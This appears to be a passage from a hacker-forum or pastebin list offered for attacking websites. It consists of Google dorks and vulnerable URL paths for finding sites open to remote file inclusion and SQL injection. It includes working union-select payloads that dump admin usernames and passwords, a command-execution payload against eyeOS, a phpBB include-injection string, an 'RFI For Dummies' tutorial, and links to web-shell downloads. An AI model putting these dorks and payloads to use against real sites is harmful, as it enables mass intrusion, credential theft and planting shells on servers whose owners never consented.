  8956. /navigation/donation.php?navigation_start=
  8957. /navigation/donation.php?navigation_middle=
  8958. /navigation/latestnews.php?navigation_start=
  8959. /navigation/latestnews.php?navigation_middle=
  8960. /navigation/links.php?navigation_middle=
  8961. /hit.php?url_hit=
  8962. /view/general.php?_SESSION[‘dirMain’]=
  8963. /track.php?path=
  8964. /connect.php?path=
  8965. /fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=
  8966. /manager/pages/AccountsPage.class.php?base_path=
  8967. /manager/pages/AddInvoicePage.class.php?base_path=
  8968. /manager/pages/AddIPAddressPage.class.php?base_path=
  8969. /manager/pages/AddTaxRulePage.class.php?base_path=
  8970. /manager/pages/AssignDomainPage.class.php?base_path=
  8971. /manager/pages/AssignHostingPage.class.php?base_path=
  8972. /manager/pages/AssignProductPage.class.php?base_path=
  8973. /manager/pages/BillingPage.class.php?base_path=
  8974. /manager/pages/BillingPaymentPage.class.php?base_path=
  8975. /manager/pages/BrowseAccountsPage.class.php?base_path=
  8976. /manager/pages/BrowseInvoicesPage.class.php?base_path=
  8977. /manager/pages/ConfigureEditUserPage.class.php?base_path=
  8978. /manager/pages/ConfigureUsersPage.class.php?base_path=
  8979. /manager/pages/DeleteAccountPage.class.php?base_path=
  8980. /manager/pages/DeleteDomainServicePage.class.php?base_path=
  8981. /manager/pages/DeleteHostingServicePage.class.php?base_path=
  8982. /manager/pages/DeleteInvoicePage.class.php?base_path=
  8983. /manager/pages/DomainServicesPage.class.php?base_path=
  8984. /manager/pages/EditDomainServicePage.class.php?base_path=
  8985. /manager/pages/EditPaymentPage.class.php?base_path=
  8986. /manager/pages/ExecuteOrderPage.class.php?base_path=
  8987. /manager/pages/ExpiredDomainsPage.class.php?base_path=
  8988. /manager/pages/FulfilledOrdersPage.class.php?base_path=
  8989. /manager/pages/GenerateInvoicesPage.class.php?base_path=
  8990. /manager/pages/HomePage.class.php?base_path=
  8991. /manager/pages/IPManagerPage.class.php?base_path=
  8992. /manager/pages/LoginPage.class.php?base_path=
  8993. /manager/pages/LogPage.class.php?base_path=
  8994. /manager/pages/ModulesPage.class.php?base_path=
  8995. /manager/pages/NewAccountPage.class.php?base_path=
  8996. /manager/pages/NewDomainServicePage.class.php?base_path=
  8997. inurl:”php?file=”
  8998. inurl:”php?page=”
  8999. inurl:”page.php?id=”
  9000. inurl:”php?doc=”
  9001. inurl:”php?filename=”
  9002. inurl:”php?oldal=”
  9003. inurl:”php?donwload=”
  9004. inurl:”php?img=”
  9005. inurl:”php?show=”
  9006. inurl:”file.php?id=”
  9007. inurl:”show.php?id=”
  9008. inurl:”download.php?id=”
  9009.  
  9010. All about localisation of file in server :)
  9011.  
  9012. and u can add intext:”(include_path=’.:/” or “Warning: include()”
  9013. adn site:domain for ur favorits domain
  9014.  
  9015. So u can use:
  9016. inurl:”php?file=” intext:”Warning: include()” site:my
  9017.  
  9018. ————————-
  9019.  
  9020. allinurl:=1+union+select+concat(username,(),password)from+users
  9021. ——————-
  9022.  
  9023. Dork
  9024. inurl:product_detail.php intext:”Akyweb”
  9025.  
  9026. [+] Exploit
  9027. /pproduct_detail.php?pid=-2 union select 1,2,3,a_name,a_pwd,6,7,8,9,10,11,12,13,14,15+from+tbladmin–
  9028.  
  9029. [+] Exploit 1
  9030. product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,7,8,9,10,11,12+from+tbladmin–
  9031.  
  9032. [+] Exploit 2
  9033. product_detail.php?pid=-39%20union%20select%201,2,3,4,concat_ws(0x3a,a_name,a_pwd),6,7,8,concat_ws(0x3a,a_name,a_pwd),10,11,12+from+tbladmin–
  9034.  
  9035. product_detail.php?pid=-39%20union%20select%201,2,3,concat_ws(0x3a,a_name,a_pwd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82+from+tbladmin–
  9036.  
  9037. inurl:/events1.php?id=
  9038.  
  9039. ASP DORK
  9040. ————
  9041. http://www.x-blank.co.cc/2009/07/kumpulan-shell-r57txt-c99txt-r57-shell.html
  9042.  
  9043. hi there here’s some dorks they may be useful ^^
  9044. “add.asp?bookid=”
  9045. “add_cart.asp?num=”
  9046. “addcart.asp?”
  9047. “addItem.asp”
  9048. “add-to-cart.asp?ID=”
  9049. “addToCart.asp?idProduct=”
  9050. “addtomylist.asp?ProdId=”
  9051. “adminEditProductFields.asp?intProdID=”
  9052. “advSearch_h.asp?idCategory=”
  9053. “affiliate.asp?ID=”
  9054. “affiliate-agreement.cfm?storeid=”
  9055. “affiliates.asp?id=”
  9056. “ancillary.asp?ID=”
  9057. “archive.asp?id=”
  9058. “article.asp?id=”
  9059. “aspx?PageID”
  9060. “basket.asp?id=”
  9061. “Book.asp?bookID=”
  9062. “book_list.asp?bookid=”
  9063. “book_view.asp?bookid=”
  9064. “BookDetails.asp?ID=”
  9065. “browse.asp?catid=”
  9066. “browse_item_details.asp”
  9067. “Browse_Item_Details.asp?Store_Id=”
  9068. “buy.asp?”
  9069. “buy.asp?bookid=”
  9070. “bycategory.asp?id=”
  9071. “cardinfo.asp?card=”
  9072. “cart.asp?action=”
  9073. “cart.asp?cart_id=”
  9074. “cart.asp?id=”
  9075. “cart_additem.asp?id=”
  9076. “cart_validate.asp?id=”
  9077. “cartadd.asp?id=”
  9078. “cat.asp?iCat=”
  9079. “catalog.asp”
  9080. “catalog.asp?CatalogID=”
  9081. “catalog_item.asp?ID=”
  9082. “catalog_main.asp?catid=”
  9083. “category.asp”
  9084. “category.asp?catid=”
  9085. “category_list.asp?id=”
  9086. “categorydisplay.asp?catid=”
  9087. “checkout.asp?cartid=”
  9088. “checkout.asp?UserID=”
  9089. “checkout_confirmed.asp?order_id=”
  9090. “checkout1.asp?cartid=”
  9091. “comersus_listCategoriesAndProducts.asp?idCategory =”
  9092. “comersus_optEmailToFriendForm.asp?idProduct=”
  9093. “comersus_optReviewReadExec.asp?idProduct=”
  9094. “comersus_viewItem.asp?idProduct=”
  9095. “comments_form.asp?ID=”
  9096. “contact.asp?cartId=”
  9097. “content.asp?id=”
  9098. “customerService.asp?TextID1=”
  9099. “default.asp?catID=”
  9100. “description.asp?bookid=”
  9101. “details.asp?BookID=”
  9102. “details.asp?Press_Release_ID=”
  9103. “details.asp?Product_ID=”
  9104. “details.asp?Service_ID=”
  9105. “display_item.asp?id=”
  9106. “displayproducts.asp”
  9107. “downloadTrial.asp?intProdID=”
  9108. “emailproduct.asp?itemid=”
  9109. “emailToFriend.asp?idProduct=”
  9110. “events.asp?ID=”
  9111. “faq.asp?cartID=”
  9112. “faq_list.asp?id=”
  9113. “faqs.asp?id=”
  9114. “feedback.asp?title=”
  9115. “freedownload.asp?bookid=”
  9116. “fullDisplay.asp?item=”
  9117. “getbook.asp?bookid=”
  9118. “GetItems.asp?itemid=”
  9119. “giftDetail.asp?id=”
  9120. “help.asp?CartId=”
  9121. “home.asp?id=”
  9122. “index.asp?cart=”
  9123. “index.asp?cartID=”
  9124. “index.asp?ID=”
  9125. “info.asp?ID=”
  9126. “item.asp?eid=”
  9127. “item.asp?item_id=”
  9128. “item.asp?itemid=”
  9129. “item.asp?model=”
  9130. “item.asp?prodtype=”
  9131. “item.asp?shopcd=”
  9132. “item_details.asp?catid=”
  9133. “item_list.asp?maingroup”
  9134. “item_show.asp?code_no=”
  9135. “itemDesc.asp?CartId=”
  9136. “itemdetail.asp?item=”
  9137. “itemdetails.asp?catalogid=”
  9138. “learnmore.asp?cartID=”
  9139. “links.asp?catid=”
  9140. “list.asp?bookid=”
  9141. “List.asp?CatID=”
  9142. “listcategoriesandproducts.asp?idCategory=”
  9143. “modline.asp?id=”
  9144. “myaccount.asp?catid=”
  9145. “news.asp?id=”
  9146. “order.asp?BookID=”
  9147. “order.asp?id=”
  9148. “order.asp?item_ID=”
  9149. “OrderForm.asp?Cart=”
  9150. “page.asp?PartID=”
  9151. “payment.asp?CartID=”
  9152. “pdetail.asp?item_id=”
  9153. “powersearch.asp?CartId=”
  9154. “price.asp”
  9155. “privacy.asp?cartID=”
  9156. “prodbycat.asp?intCatalogID=”
  9157. “prodetails.asp?prodid=”
  9158. “prodlist.asp?catid=”
  9159. “product.asp?bookID=”
  9160. “product.asp?intProdID=”
  9161. “product_info.asp?item_id=”
  9162. “productDetails.asp?idProduct=”
  9163. “productDisplay.asp”
  9164. “productinfo.asp?item=”
  9165. “productlist.asp?ViewType=Category&CategoryID= ”
  9166. “productpage.asp”
  9167. “products.asp?ID=”
  9168. “products.asp?keyword=”
  9169. “products_category.asp?CategoryID=”
  9170. “products_detail.asp?CategoryID=”
  9171. “productsByCategory.asp?intCatalogID=”
  9172. “prodView.asp?idProduct=”
  9173. “promo.asp?id=”
  9174. “promotion.asp?catid=”
  9175. “pview.asp?Item=”
  9176. “resellers.asp?idCategory=”
  9177. “results.asp?cat=”
  9178. “savecart.asp?CartId=”
  9179. “search.asp?CartID=”
  9180. “searchcat.asp?search_id=”
  9181. “Select_Item.asp?id=”
  9182. “Services.asp?ID=”
  9183. “shippinginfo.asp?CartId=”
  9184. “shop.asp?a=”
  9185. “shop.asp?action=”
  9186. “shop.asp?bookid=”
  9187. “shop.asp?cartID=”
  9188. “shop_details.asp?prodid=”
  9189. “shopaddtocart.asp”
  9190. “shopaddtocart.asp?catalogid=”
  9191. “shopbasket.asp?bookid=”
  9192. “shopbycategory.asp?catid=”
  9193. “shopcart.asp?title=”
  9194. “shopcreatorder.asp”
  9195. “shopcurrency.asp?cid=”
  9196. “shopdc.asp?bookid=”
  9197. “shopdisplaycategories.asp”
  9198. “shopdisplayproduct.asp?catalogid=”
  9199. “shopdisplayproducts.asp”
  9200. “shopexd.asp”
  9201. “shopexd.asp?catalogid=”
  9202. “shopping_basket.asp?cartID=”
  9203. “shopprojectlogin.asp”
  9204. “shopquery.asp?catalogid=”
  9205. “shopremoveitem.asp?cartid=”
  9206. “shopreviewadd.asp?id=”
  9207. “shopreviewlist.asp?id=”
  9208. “ShopSearch.asp?CategoryID=”
  9209. “shoptellafriend.asp?id=”
  9210. “shopthanks.asp”
  9211. “shopwelcome.asp?title=”
  9212. “show_item.asp?id=”
  9213. “show_item_details.asp?item_id=”
  9214. “showbook.asp?bookid=”
  9215. “showStore.asp?catID=”
  9216. “shprodde.asp?SKU=”
  9217. “specials.asp?id=”
  9218. “store.asp?id=”
  9219. “store_bycat.asp?id=”
  9220. “store_listing.asp?id=”
  9221. “Store_ViewProducts.asp?Cat=”
  9222. “store-details.asp?id=”
  9223. “storefront.asp?id=”
  9224. “storefronts.asp?title=”
  9225. “storeitem.asp?item=”
  9226. “StoreRedirect.asp?ID=”
  9227. “subcategories.asp?id=”
  9228. “tek9.asp?”
  9229. “template.asp?Action=Item&pid=”
  9230. “topic.asp?ID=”
  9231. “tuangou.asp?bookid=”
  9232. “type.asp?iType=”
  9233. “updatebasket.asp?bookid=”
  9234. “updates.asp?ID=”
  9235. “view.asp?cid=”
  9236. “view_cart.asp?title=”
  9237. “view_detail.asp?ID=”
  9238. “viewcart.asp?CartId=”
  9239. “viewCart.asp?userID=”
  9240. “viewCat_h.asp?idCategory=”
  9241. “viewevent.asp?EventID=”
  9242. “viewitem.asp?recor=”
  9243. “viewPrd.asp?idcategory=”
  9244. “ViewProduct.asp?misc=”
  9245. “voteList.asp?item_ID=”
  9246. “whatsnew.asp?idCategory=”
  9247. “WsAncillary.asp?ID
  9248. [TUT]RFI For Dummies
  9249. ———————–
  9250.  
  9251.  
  9252. Dorks :
  9253. inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
  9254.  
  9255. inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  9256.  
  9257. inurl:/include/new-visitor.inc.php?lvc_include_dir=
  9258.  
  9259. inurl:/_functions.php?prefix=
  9260.  
  9261. inurl:/cpcommerce/_functions.php?prefix=
  9262.  
  9263. inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
  9264.  
  9265. inurl:/modules/agendax/addevent.inc.php?agendax_path=
  9266.  
  9267. inurl:/ashnews.php?pathtoashnews=
  9268.  
  9269. inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
  9270.  
  9271. inurl:/pm/lib.inc.php?pm_path=
  9272.  
  9273. inurl:/b2-tools/gm-2-b2.php?b2inc=
  9274.  
  9275. inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  9276.  
  9277. inurl:/modules/agendax/addevent.inc.php?agendax_path=
  9278.  
  9279. inurl:/includes/include_once.php?include_file=
  9280.  
  9281. inurl:/e107/e107_handlers/secure_img_render.php?p=
  9282.  
  9283. inurl:/shoutbox/expanded.php?conf=
  9284.  
  9285. inurl:/main.php?x=
  9286.  
  9287. inurl:/myPHPCalendar/admin.php?cal_dir=
  9288.  
  9289. inurl:/index.php/main.php?x=
  9290.  
  9291. inurl:/index.php?include=
  9292.  
  9293. inurl:/index.php?x=
  9294.  
  9295. inurl:/index.php?open=
  9296.  
  9297. inurl:/index.php?visualizar=
  9298.  
  9299. inurl:/template.php?pagina=
  9300.  
  9301. inurl:/index.php?pagina=
  9302.  
  9303. inurl:/index.php?inc=
  9304.  
  9305. inurl:/includes/include_onde.php?include_file=
  9306.  
  9307. inurl:/index.php?page=
  9308.  
  9309. inurl:/index.php?pg=
  9310.  
  9311. inurl:/index.php?show=
  9312.  
  9313. inurl:/index.php?cat=
  9314.  
  9315. inurl:/index.php?file=
  9316.  
  9317. inurl:/db.php?path_local=
  9318.  
  9319. inurl:/index.php?site=
  9320.  
  9321. inurl:/htmltonuke.php?filnavn=
  9322.  
  9323. inurl:/livehelp/inc/pipe.php?HCL_path=
  9324.  
  9325. inurl:/hcl/inc/pipe.php?HCL_path=
  9326.  
  9327. inurl:/inc/pipe.php?HCL_path=
  9328.  
  9329. inurl:/support/faq/inc/pipe.php?HCL_path=
  9330.  
  9331. inurl:/help/faq/inc/pipe.php?HCL_path=
  9332.  
  9333. inurl:/helpcenter/inc/pipe.php?HCL_path=
  9334.  
  9335. inurl:/live-support/inc/pipe.php?HCL_path=
  9336.  
  9337. inurl:/gnu3/index.php?doc=
  9338.  
  9339. inurl:/gnu/index.php?doc=
  9340.  
  9341. inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
  9342.  
  9343. inurl:/forum/install.php?phpbb_root_dir=
  9344.  
  9345. inurl:/includes/calendar.php?phpc_root_path=
  9346.  
  9347. inurl:/includes/setup.php?phpc_root_path=
  9348.  
  9349. inurl:/inc/authform.inc.php?path_pre=
  9350.  
  9351. inurl:/include/authform.inc.php?path_pre=
  9352.  
  9353. inurl:index.php?nic=
  9354.  
  9355. inurl:index.php?sec=
  9356.  
  9357. inurl:index.php?content=
  9358.  
  9359. inurl:index.php?link=
  9360.  
  9361. inurl:index.php?filename=
  9362.  
  9363. inurl:index.php?dir=
  9364.  
  9365. inurl:index.php?document=
  9366.  
  9367. inurl:index.php?view=
  9368.  
  9369. inurl:*.php?sel=
  9370.  
  9371. inurl:*.php?session=&content=
  9372.  
  9373. inurl:*.php?locate=
  9374.  
  9375. inurl:*.php?place=
  9376.  
  9377. inurl:*.php?layout=
  9378.  
  9379. inurl:*.php?go=
  9380.  
  9381. inurl:*.php?catch=
  9382.  
  9383. inurl:*.php?mode=
  9384.  
  9385. inurl:*.php?name=
  9386.  
  9387. inurl:*.php?loc=
  9388.  
  9389. inurl:*.php?f=
  9390.  
  9391. inurl:*.php?inf=
  9392.  
  9393. inurl:*.php?pg=
  9394.  
  9395. inurl:*.php?load=
  9396.  
  9397. inurl:*.php?naam=
  9398.  
  9399. allinurl:/index.php?page= site:*.dk
  9400.  
  9401. allinurl:/index.php?file= site:*.dk
  9402.  
  9403. INURL OR ALLINURL WITH:
  9404.  
  9405. /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
  9406.  
  9407. /includes/header.php?systempath=
  9408.  
  9409. /Gallery/displayCategory.php?basepath=
  9410.  
  9411. /index.inc.php?PATH_Includes=
  9412.  
  9413. /ashnews.php?pathtoashnews=
  9414.  
  9415. /ashheadlines.php?pathtoashnews=
  9416.  
  9417. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  9418.  
  9419. /demo/includes/init.php?user_inc=
  9420.  
  9421. /jaf/index.php?show=
  9422.  
  9423. /inc/shows.inc.php?cutepath=
  9424.  
  9425. /poll/admin/common.inc.php?base_path=
  9426.  
  9427. /pollvote/pollvote.php?pollname=
  9428.  
  9429. /sources/post.php?fil_config=
  9430.  
  9431. /modules/My_eGallery/public/displayCategory.php?basepath=
  9432.  
  9433. /bb_lib/checkdb.inc.php?libpach=
  9434.  
  9435. /include/livre_include.php?no_connect=lol&chem_absolu=
  9436.  
  9437. /index.php?from_market=Y&pageurl=
  9438.  
  9439. /modules/mod_mainmenu.php?mosConfig_absolute_path=
  9440.  
  9441. /pivot/modules/module_db.php?pivot_path=
  9442.  
  9443. /modules/4nAlbum/public/displayCategory.php?basepath=
  9444.  
  9445. /derniers_commentaires.php?rep=
  9446.  
  9447. /modules/coppermine/themes/default/theme.php?THEME_DIR=
  9448.  
  9449. /modules/coppermine/include/init.inc.php?CPG_M_DIR=
  9450.  
  9451. /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
  9452.  
  9453. /coppermine/themes/maze/theme.php?THEME_DIR=
  9454.  
  9455. /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  9456.  
  9457. /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  9458.  
  9459. /myPHPCalendar/admin.php?cal_dir=
  9460.  
  9461. /agendax/addevent.inc.php?agendax_path=
  9462.  
  9463. /modules/mod_mainmenu.php?mosConfig_absolute_path=
  9464.  
  9465. /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
  9466.  
  9467. /main.php?page=
  9468.  
  9469. /default.php?page=
  9470.  
  9471. /index.php?action=
  9472.  
  9473. /index1.php?p=
  9474.  
  9475. /index2.php?x=
  9476.  
  9477. /index2.php?content=
  9478.  
  9479. /index.php?conteudo=
  9480.  
  9481. /index.php?cat=
  9482.  
  9483. /include/new-visitor.inc.php?lvc_include_dir=
  9484.  
  9485. /modules/agendax/addevent.inc.php?agendax_path=
  9486.  
  9487. /shoutbox/expanded.php?conf=
  9488.  
  9489. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  9490.  
  9491. /pivot/modules/module_db.php?pivot_path=
  9492.  
  9493. /library/editor/editor.php?root=
  9494.  
  9495. /library/lib.php?root=
  9496.  
  9497. /e107/e107_handlers/secure_img_render.php?p=
  9498.  
  9499. /zentrack/index.php?configFile=
  9500.  
  9501. /main.php?x=
  9502.  
  9503. /becommunity/community/index.php?pageurl=
  9504.  
  9505. /GradeMap/index.php?page=
  9506.  
  9507. /index4.php?body=
  9508.  
  9509. /side/index.php?side=
  9510.  
  9511. /main.php?page=
  9512.  
  9513. /es/index.php?action=
  9514.  
  9515. /index.php?sec=
  9516.  
  9517. /index.php?main=
  9518.  
  9519. /index.php?sec=
  9520.  
  9521. /index.php?menu=
  9522.  
  9523. /html/page.php?page=
  9524.  
  9525. /page.php?view=
  9526.  
  9527. /index.php?menu=
  9528.  
  9529. /main.php?view=
  9530.  
  9531. /index.php?page=
  9532.  
  9533. /content.php?page=
  9534.  
  9535. /main.php?page=
  9536.  
  9537. /index.php?x=
  9538.  
  9539. /main_site.php?page=
  9540.  
  9541. /index.php?L2=
  9542.  
  9543. /content.php?page=
  9544.  
  9545. /main.php?page=
  9546.  
  9547. /index.php?x=
  9548.  
  9549. /main_site.php?page=
  9550.  
  9551. /index.php?L2=
  9552.  
  9553. /index.php?show=
  9554.  
  9555. /tutorials/print.php?page=
  9556.  
  9557. /index.php?page=
  9558.  
  9559. /index.php?level=
  9560.  
  9561. /index.php?file=
  9562.  
  9563. /index.php?inter_url=
  9564.  
  9565. /index.php?page=
  9566.  
  9567. /index2.php?menu=
  9568.  
  9569. /index.php?level=
  9570.  
  9571. /index1.php?main=
  9572.  
  9573. /index1.php?nav=
  9574.  
  9575. /index1.php?link=
  9576.  
  9577. /index2.php?page=
  9578.  
  9579. /index.php?myContent=
  9580.  
  9581. /index.php?TWC=
  9582.  
  9583. /index.php?sec=
  9584.  
  9585. /index1.php?main=
  9586.  
  9587. /index2.php?page=
  9588.  
  9589. /index.php?babInstallPath=
  9590.  
  9591. /main.php?body=
  9592.  
  9593. /index.php?z=
  9594.  
  9595. /main.php?view=
  9596.  
  9597. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  9598.  
  9599. /index.php?file=
  9600.  
  9601. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  9602.  
  9603. 1. allinurl:my_egallery site:.org
  9604. /modules/My_eGallery/public/displayCategory.php?basepath=
  9605.  
  9606. 2. allinurl:xgallery site:.org
  9607. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
  9608.  
  9609. 3. allinurl:coppermine site:.org
  9610. /modules/coppermine/themes/default/theme.php?THEME_DIR=
  9611.  
  9612. 4. allinurl:4nAlbum site:.org
  9613. /modules/4nAlbum/public/displayCategory.php?basepath=
  9614.  
  9615. 5. allinurlP:NphpBB2 site:.org
  9616. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
  9617.  
  9618. 6. allinurl:ihm.php?p=
  9619.  
  9620. 7. Keyword : “powered by AllMyLinks”
  9621. /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  9622.  
  9623. 8. allinurl:/modules.php?name=allmyguests
  9624. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  9625.  
  9626. 9. allinurl:/Popper/index.php?
  9627. /Popper/index.php?childwindow.inc.php?form=
  9628.  
  9629. 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
  9630. yahoo = by Kietu? v 3.2
  9631. /kietu/index.php?kietu[url_hit]=
  9632.  
  9633. 11. keyword : “Powered by phpBB 2.0.6”
  9634. /html&highlight=%2527.include($_GET[a]),exit.%2527&a=
  9635.  
  9636. 12. keyword : “powered by CubeCart 3.0.6”
  9637. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  9638.  
  9639. 13. keyword : “powered by paBugs 2.0 Beta 3″
  9640. /class.mysql.php?path_to_bt_dir=
  9641.  
  9642. 14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
  9643. /ashnews.php?pathtoashnews=
  9644.  
  9645. 15. keyword : /phorum/login.php
  9646. /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
  9647.  
  9648. 16. allinurl:ihm.php?p=*
  9649.  
  9650. 14. keyword : “powered eyeOs”
  9651. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup %5d=system($cmd);&cmd=id
  9652. diganti dengan :
  9653. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup %5d=include($_GET%5ba%5d);&a=
  9654.  
  9655. 15. allinurl:.php?bodyfile=
  9656.  
  9657. 16. allinurl:/includes/orderSuccess.inc.php?glob=
  9658. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  9659.  
  9660. 17. allinurl:forums.html
  9661. /modules.php?name=
  9662.  
  9663. 18. allinurl:/default.php?page=home
  9664. 19. allinurl:/folder.php?id=
  9665.  
  9666. 20. allinurl:main.php?pagina=
  9667. /paginedinamiche/main.php?pagina=
  9668.  
  9669. 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
  9670. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  9671.  
  9672. 22. allinurl:application.php?base_path=
  9673. /application.php?base_path=
  9674.  
  9675. 23. allinurlp:hplivehelper
  9676. /phplivehelper/initiate.php?abs_path=
  9677.  
  9678. 24. allinurlp:hpnuke
  9679. /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  9680.  
  9681. 25. key word : “powered by Fantastic News v2.1.2”
  9682. /archive.php?CONFIG[script_path]=
  9683.  
  9684. 26. keyword: “powered by smartblog” AND inurl:?page=login
  9685. /index.php?page=
  9686.  
  9687. 27. allinurl:/forum/
  9688. /forum/admin/index.php?inc_conf=
  9689.  
  9690. 28. keyword:”Powered By FusionPHP”
  9691. /templates/headline_temp.php?nst_inc=
  9692.  
  9693. 29. allinurl:shoutbox/expanded.php filetypep:hp
  9694. /shoutbox/expanded.php?conf=
  9695.  
  9696. 30. allinurl: /osticket/
  9697. /osticket/include/main.php?config[search_disp]=true&include_dir=
  9698.  
  9699. 31. keyword : “Powered by iUser”
  9700. /common.php?include_path=
  9701.  
  9702. 32. allinurl: “static.php?load=”
  9703. /static.php?load=
  9704.  
  9705. 33. keyworld : /phpcoin/login.php
  9706. /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
  9707.  
  9708. 34. keyworld: allinurl:/phpGedview/login.php site:
  9709. /help_text_vars.php?dir&PGV_BASE_DIRECTORY=
  9710.  
  9711. 35. allinurl:/folder.php?id=
  9712. /classes.php?LOCAL_PATH=
  9713.  
  9714. inurl:”/lire.php?rub=”
  9715.  
  9716. inurl:”/os/pointer.php?url=”
  9717.  
  9718. inurl:folder.php?id=
  9719.  
  9720. inurl:”show.php?page=”
  9721.  
  9722. inurl:”index2.php?DoAction=”
  9723.  
  9724. inurl:”index.php?canal=”
  9725.  
  9726. inurl:”index.php?screen=”
  9727.  
  9728. inurl:”index.php?langc=”
  9729.  
  9730. inurl:”index.php?Language=”
  9731.  
  9732. inurl:”view.php?page=”
  9733.  
  9734. dork: “powered by doodle cart”
  9735. rfi of this dork: enc/content.php?Home_Path=
  9736.  
  9737. dork: “Login to Calendar”
  9738. rfi of this dork: /embed/day.php?path=
  9739.  
  9740. dork: “powered by EQdkp”
  9741. rfi of this dork: /includes/dbal.php?eqdkp_root_path=
  9742.  
  9743. inurl:”template.php?goto=”
  9744.  
  9745. inurl:”video.php?content=”
  9746.  
  9747. inurl:”pages.php?page=”
  9748.  
  9749. inurl:”index1.php?choix=”
  9750.  
  9751. inurl:”index1.php?menu=”
  9752.  
  9753. inurl:”index2.php?ascii_seite=”
  9754.  
  9755. dork: inurl:surveys
  9756. rfi to this dork: /surveys/survey.inc.php?path=
  9757.  
  9758. inurl:”index.php?body=”
  9759.  
  9760. dork: allinurl:adobt sitel
  9761. rfi to this dork: /classes/adodbt/sql.php?classes_dir=
  9762.  
  9763. dork: “Powered By ScozNews”
  9764. rfi to this dork: /sources/functions.php?CONFIG[main_path]=
  9765. rfi to this dork: /sources/template.php?CONFIG[main_path]=
  9766.  
  9767. inurl:”kb_constants.php?module_root_path=”
  9768.  
  9769. dork: allinurl:”mcf.php”
  9770. rfi to this dork: /mcf.php?content=
  9771.  
  9772. dork: inurl:”main.php?sayfa=”
  9773. rfi to this dork: /main.php?sayfa=
  9774.  
  9775. dork: “MobilePublisherPHP”
  9776. rfi to this dork: /header.php?abspath=
  9777.  
  9778. dork: “powered by phpCOIN 1.2.3″
  9779. rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  9780.  
  9781. allinurl:login.php?dir=
  9782.  
  9783. inurl:”index.php?go=”
  9784.  
  9785. inurl:”index1.php?=”
  9786.  
  9787. inurl:”lib/gore.php?libpath=”
  9788.  
  9789. inurl:”index2.php?p=”
  9790.  
  9791. Shells :
  9792. http://www.darkmindz.com/shell/
  9793.  
  9794. Feel free to ask questions!
  9795.  
  9796. inurl:gov id & intext:warning mysql
  9797.  
  9798. inurl:index.php?id=
  9799. inurl:trainers.php?id=
  9800. inurl:buy.php?category=
  9801. inurl:article.php?ID=
  9802. inurl:play_old.php?id=
  9803. inurl:declaration_more.php?decl_id=
  9804. inurl:pageid=
  9805. inurl:games.php?id=
  9806. inurl:page.php?file=
  9807. inurl:newsDetail.php?id=
  9808. inurl:gallery.php?id=
  9809. inurl:article.php?id=
  9810. inurl:show.php?id=
  9811. inurl:staff_id=
  9812. inurl:newsitem.php?num=
  9813. inurl:readnews.php?id=
  9814. inurl:top10.php?cat=
  9815. inurl:historialeer.php?num=
  9816. inurl:reagir.php?num=
  9817. inurl:Stray-Questions-View.php?num=
  9818. inurl:forum_bds.php?num=
  9819. inurl:game.php?id=
  9820. inurl:view_product.php?id=
  9821. inurl:newsone.php?id=
  9822. inurl:sw_comment.php?id=
  9823. inurl:news.php?id=
  9824. inurl:avd_start.php?avd=
  9825. inurl:event.php?id=
  9826. inurl:product-item.php?id=
  9827. inurl:sql.php?id=
  9828. inurl:news_view.php?id=
  9829. inurl:select_biblio.php?id=
  9830. inurl:humor.php?id=
  9831. inurl:aboutbook.php?id=
  9832. inurl:ogl_inet.php?ogl_id=
  9833. inurl:fiche_spectacle.php?id=
  9834. inurl:communique_detail.php?id=
  9835. inurl:sem.php3?id=
  9836. inurl:kategorie.php4?id=
  9837. inurl:news.php?id=
  9838. inurl:index.php?id=
  9839. inurl:faq2.php?id=
  9840. inurl:show_an.php?id=
  9841. inurl:preview.php?id=
  9842. inurl:loadpsb.php?id=
  9843. inurl:opinions.php?id=
  9844. inurl:spr.php?id=
  9845. inurl:pages.php?id=
  9846. inurl:announce.php?id=
  9847. inurl:clanek.php4?id=
  9848. inurl:participant.php?id=
